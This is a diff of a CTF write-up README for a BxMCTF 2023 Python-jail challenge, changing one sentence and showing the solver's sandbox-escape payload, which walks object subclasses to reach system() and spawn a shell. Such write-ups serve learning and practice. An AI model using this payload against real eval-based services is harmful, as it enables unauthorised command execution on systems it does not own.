daffainfo/ctf-writeup/BxMCTF 2023/Bonus The Revenge of Checkpass 1/README.md

 This code snippet prompts the user to enter a Python list as input, evaluates the input string as a Python expression, and assigns the resulting list to the variable lis, while restricting access to built-in functions and variables for security purposes.

 ## How to Solve?
 Im using PyJail payload to breakout from the sandbox.
-Here is the payload that I used
+Here is the payload I used

 ```
 ().__class__.__base__.__subclasses__()[141].__init__.__globals__["system"]("sh")